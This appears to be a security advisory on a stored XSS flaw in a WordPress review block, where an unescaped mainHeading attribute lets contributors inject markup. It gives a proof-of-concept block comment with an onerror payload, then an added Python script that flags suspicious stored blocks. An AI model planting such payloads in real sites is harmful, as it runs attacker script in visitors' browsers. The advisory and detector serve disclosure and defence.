Description
The plugin does not properly escape its mainHeadings blocks’ attribute before appending it to the final rendered block, allowing contributors to conduct Stored XSS attacks.
As a contributor, put the following payload in a post while in Code Editor mode:
<!-- wp:themeisle-blocks/review {"id":"wp-block-themeisle-blocks-review-b973b49a","title":"123","mainHeading":"img src=x onerror=alert(1) style=width:150px;","className":""} /-->
The XSS will be triggered when viewing/previewing the post.
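A defender-side check for content already stored on a site, added here as an example and not taken from the advisory or the plugin's code: it parses serialized block comments in post content and flags review blocks whose mainHeading is anything other than a bare heading tag name. The h1 to h6 allowlist, the function name and the benign sample block are assumptions made for this example.

```python
import json
import re

# Assumption (not stated in the advisory): a legitimate mainHeading value
# is a bare heading tag name.
ALLOWED_HEADINGS = {"h1", "h2", "h3", "h4", "h5", "h6"}

# Blocks with attributes are serialized as <!-- wp:name {json} /--> or
# <!-- wp:name {json} -->. The lazy match extends to the closing brace
# that sits directly before the comment terminator.
BLOCK_RE = re.compile(
    r"<!--\s+wp:(?P<name>[a-z0-9-]+(?:/[a-z0-9-]+)?)\s+(?P<attrs>\{.*?\})\s+/?-->",
    re.DOTALL,
)

def find_suspicious_review_blocks(post_content, block_name="themeisle-blocks/review"):
    """Return one finding per review block whose mainHeading is not allowlisted."""
    findings = []
    for match in BLOCK_RE.finditer(post_content):
        if match.group("name") != block_name:
            continue
        try:
            # json.loads also decodes \u003c style escapes used in block attributes.
            attrs = json.loads(match.group("attrs"))
        except json.JSONDecodeError:
            findings.append({"id": None, "mainHeading": None,
                             "reason": "unparseable attributes"})
            continue
        heading = attrs.get("mainHeading")
        if heading is None:
            continue  # attribute not set; nothing to evaluate
        if not isinstance(heading, str) or heading.lower() not in ALLOWED_HEADINGS:
            findings.append({"id": attrs.get("id"), "mainHeading": heading,
                             "reason": "not a heading tag name"})
    return findings

# Constructed sample: one benign block (made up for this example) and the
# block quoted in the advisory above.
SAMPLE_POST = '''
<!-- wp:paragraph --><p>intro</p><!-- /wp:paragraph -->
<!-- wp:themeisle-blocks/review {"id":"wp-block-themeisle-blocks-review-00000001","title":"ok","mainHeading":"h3"} /-->
<!-- wp:themeisle-blocks/review {"id":"wp-block-themeisle-blocks-review-b973b49a","title":"123","mainHeading":"img src=x onerror=alert(1) style=width:150px;","className":""} /-->
'''

if __name__ == "__main__":
    for finding in find_suspicious_review_blocks(SAMPLE_POST):
        print(finding)
```

Run it over each row's post content from an export or database dump; a finding identifies a post to review and clean.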